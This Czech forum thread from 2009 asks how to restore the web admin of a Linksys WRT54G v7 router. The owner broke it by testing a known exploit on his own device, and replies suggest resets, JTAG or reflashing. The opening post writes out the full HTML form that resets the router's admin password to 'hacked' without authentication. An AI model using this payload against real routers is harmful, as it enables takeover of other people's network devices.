abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    Kritická zranitelnost v jsPDF, CVE-2025-68428
    včera 18:33 | Bezpečnostní upozornění

    Vládní CERT (GovCERT.CZ) upozorňuje (𝕏) na kritickou zranitelnost v jsPDF, CVE-2025-68428. Tato zranitelnost umožňuje neautentizovaným vzdáleným útočníkům číst libovolné soubory z lokálního souborového systému serveru při použití jsPDF v prostředí Node.js. Problém vzniká kvůli nedostatečné validaci vstupu u cest k souborům předávaných několika metodám jsPDF. Útočník může zneužít tuto chybu k exfiltraci citlivých

    … více »
    Ladislav Hagara | Komentářů: 1
    5. Mobile Hackfest: Linux na telefonech, kernel a FOSDEM
    včera 16:22 | Komunita

    V úterý 13. ledna 2025 se v pražské kanceláři SUSE v Karlíně uskuteční 5. Mobile Hackday, komunitní setkání zaměřené na Linux na mobilních zařízeních, kernelový vývoj a související infrastrukturu. Akci pořádá David Heidelberg.

    … více »
    lkocman | Komentářů: 0
    Blíží se síťařský CSNOG 2026. Registrujte se co nejdříve
    včera 16:00 | Pozvánky

    Už je 14 dní zbývá do začátku osmého ročníku komunitního setkání nejen českých a slovenských správců sítí CSNOG 2026. Registrace na akci je stále otevřená, ale termín uzávěrky se blíží. I proto organizátoři doporučují, aby se zájemci přihlásili brzy, nejlépe ještě tento týden.

    … více »
    VSladek | Komentářů: 0
    Virtuální Bastlírna vol. 58: Matter a Thread útočí na Zigbee!
    včera 02:22 | Pozvánky

    Rok 2026 sotva začal, ale už v prvním týdnu se nashromáždilo nezvykle mnoho zajímavostí, událostí a zpráv. Jedno je ale jisté - už ve středu se koná Virtuální Bastlírna - online setkání techniků, bastlířů a ajťáků, kam rozhodně doražte, ideálně s mikrofonem a kamerou a zapojte se do diskuze o zajímavých technických tématech.

    Dějí se i ne zcela šťastné věci – zdražování a nedostupnost RAM a SSD, nedostatek waferů, 3€ clo na každou položku z Číny … více »
    bkralik | Komentářů: 0
    Vývojáři GNOME a Firefoxu zvažují ve výchozím nastavení vypnutí funkce vkládání prostředním tlačítkem myši
    5.1. 22:00 | Komunita

    Vývojáři GNOME a Firefoxu zvažují ve výchozím nastavení vypnutí funkce vkládání prostředním tlačítkem myši. Zdůvodnění: "U většiny uživatelů tento X11ism způsobuje neočekávané chování".

    Ladislav Hagara | Komentářů: 10
    GNU ddrescue 1.30
    5.1. 15:22 | Nová verze

    Nástroj pro obnovu dat GNU ddrescue (Wikipedie) byl vydán v nové verzi 1.30. Vylepšena byla automatická obnova z disků s poškozenou čtecí hlavou.

    Ladislav Hagara | Komentářů: 0
    IPv6 má již 30 let
    5.1. 12:55 | IT novinky

    Protokol IPv6 má již 30 let. První návrh specifikace RFC 1883 je z prosince 1995.

    Ladislav Hagara | Komentářů: 13
    Steam Awards 2025
    5.1. 01:55 | IT novinky

    Byli vyhlášeni vítězové ocenění Steam Awards 2025. Hrou roku a současně nejlepší hrou, která vám nejde, je Hollow Knight: Silksong.

    Ladislav Hagara | Komentářů: 2
    Manjaro 26.0 Anh-Linh
    4.1. 21:11 | Nová verze

    Byla vydána nová verze 26.0 linuxové distribuce Manjaro (Wikipedie). Její kódové jméno je Anh-Linh. Ke stažení je v edicích GNOME, KDE PLASMA a XFCE.

    Ladislav Hagara | Komentářů: 0
    Jednotný seznam blokovaných internetových stránek vedený ČTÚ obsahoval také ČTÚ
    3.1. 20:22 | Humor

    Jednotný seznam blokovaných internetových stránek vedený Českým telekomunikační úřadem obsahoval také Český telekomunikační úřad.

    Ladislav Hagara | Komentářů: 67
    Centrum | Napsat | Starší
    navrhněte » Anketa
    Které desktopové prostředí na Linuxu používáte?
     (0%)
     (4%)
     (0%)
     (11%)
     (24%)
     (6%)
     (6%)
     (3%)
     (11%)
     (52%)
    Celkem 228 hlasů
     Komentářů: 4, poslední včera 12:50
    Rozcestník
    AbcLinuxu
    HDmag.cz
    AbcLinuxu:/ Poradna / Hardwarová poradna / Router Linksys WRT54G - hacked - nejde http na routeru
    Štítky: HTML, Internet, konfigurace, password, router, TELNET, web

    Dotaz: Router Linksys WRT54G - hacked - nejde http na routeru

    Otto Šabart avatar 9.5.2009 09:44 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Router Linksys WRT54G - hacked - nejde http na routeru
    Přečteno: 1219×
    Ahojte, mam menší problém.

    Vlastnim router Linksys wrt54g (version 7). Neveril jsem tomu, že existuje na tento router exploit pomocí kterého si bez problému zmenite cele master password. Musel jsem to vyzkouset. Exploit posle data pres POST na script roterovsky script manage.tri.

    Ukazka vypada nejak takto:

    <\form method="post" action="http://192.168.2.1/manage.tri">
    <\input type="hidden" name="remote_mgt_https" value="0">
    <\input type="hidden" name="http_enable" value="1">
    <\input type="hidden" name="https_enable" value="0">
    <\input type="hidden" name="PasswdModify" value="1">
    <\input type="hidden" name="http_passwd" value="hacked">
    <\input type="hidden" name="http_passwdConfirm" value="hacked">
    <\input type="hidden" name="_http_enable" value="1">
    <\input type="hidden" name="web_wl_filter" value="1">
    <\input type="hidden" name="remote_management" value="0">
    <\input type="hidden" name="upnp_enable" value="1">
    <\input type="hidden" name="layout" value="en">
    <\input type="submit">
    <\/form>

     Tento html kod zmeni master pasword na "hacked". Neveril jsem tomu, a hle, ono se to povedlo. Do administrace me to pustilo pod novým heslem. Neveril jsem tomu. Musel jsem vse vyzkouset jeste jednou. Jenze po druhem pokusu na routeru spadla cela sluzba pro HTTP a uz neslo jit vubec do webove administrace. Ani po vypnuti a zapnuti routeru http nenaskoci. Bojim se router vyresetovat uplne, protoze si myslim, ze se akorat vyresetuje konfigurace a http stejne nenaskoci. Router by pak byl uz uplne nepouzitelny. Krome http na routeru funguje zatim vsechno a sit je normalne funkcni - jen proste nejde zmenit jakoukoliv konfiguraci.

    Situaci jsem chtel resit pres telnet. Jenze u verze 7 telnet nefunguje.

    Nevite nekdo jakym zpusobem http nahodit nebo jestli MasterReset zafunguje a nahodi sluzbu?

    Za vsechny napady dekuju.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Řešení dotazu:

    Nástroje: Začni sledovat (1) ?Zašle upozornění na váš email při vložení nového komentáře.

    Odpovědi

    Jendа avatar 9.5.2009 14:18 Jendа | skóre: 78 | blog: Jenda | JO70FB
    Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru
    Eh, otevřít to a připojit se přes JTAG asi nemůžeš, že? Jinak já bych to vyresetoval a když to nepomůže, tak bych si sehnal nádobíčko pro připojení k sériáku... Google: Linksys WRT54G jtag, nezoufej, vypadá to, že si s ním užili i jiní ;-).
    Otto Šabart avatar 9.5.2009 14:35 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru
    No, bude to jeste asi dost zajimavy. Pockam na chvili az bude opravdu nutne router vyresetovat a uvidime jestli sluzba naskoci. Resit to pres ten JTAG je celkem neomalene reseni, ale kdyz mi nic jineho nezbyde, tak to zkusim. Treba se neco priucim.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com
    10.5.2009 19:39 R
    Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

    Ahoj, myslím že nejlepší by bylo udělat master reset a nahrát poslední "Firmware Version: v7.00.4" 

    Vlastním také WRT54G a http normálně do internetu otevřené nemám, ale jednou jsem ho potřeboval konfigurovat vzdáleně a tak jsem to na pár dní otevřel. Když jsem se pak chtěl připojit, tak to na http nedalo ani přihlašovací okno. Restart nepomohl, tak jsem udělal master reset, ten pomohl. Pokusil jsem se nahrát poslední firmware 7.00.4 to ale z neznámého důvodu nedopadlo a WRT byl v háji. Až nakonec po různých kombinacích zapnutí vypnutí a resetů se router rozjel a po připojení na http se objevilo okénko kde jediné co se dalo dělat byl upgrade firmware. Tak jsem ho tam znovu nahrál, tentokrát to dopadlo OK a router chodí.

    Otto Šabart avatar 10.5.2009 21:52 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru

    Ja ("nastesti" - ono jak kdy :-) ), primo do internetu pripojen nejsem.  Jsem kryty jeste jednim routerem, takze o bezpecnost obavy tolik nemam. Asi pujdu na ten master reset, uvidime jestli naskoci. Pak sem dam vedet jak to dopadlo. Uz nevim jiste jestli jsem mel zupgradovano na 7.004, ale urcite to kdyztak napravim (jestli bude jeste moznost to napravit :-) ).

    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com
    Řešení 1× (Otto Šabart (tazatel))
    Otto Šabart avatar 11.5.2009 18:03 Otto Šabart | skóre: 13 | blog: KatiePC blog
    Rozbalit Rozbalit vše Re: Router Linksys WRT54G - hacked - nejde http na routeru
    Takze jsem router vyresetoval, a to nekolikrat. Asi az treti restart pomohl a http naskocilo. Vse jsem znovu nakonfiguraoval a uz vse funguje tak jak ma. Dekuji za odpovedi.
    *´¨)¸.·´¨)¸.·***·>>> www.seberm.com

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.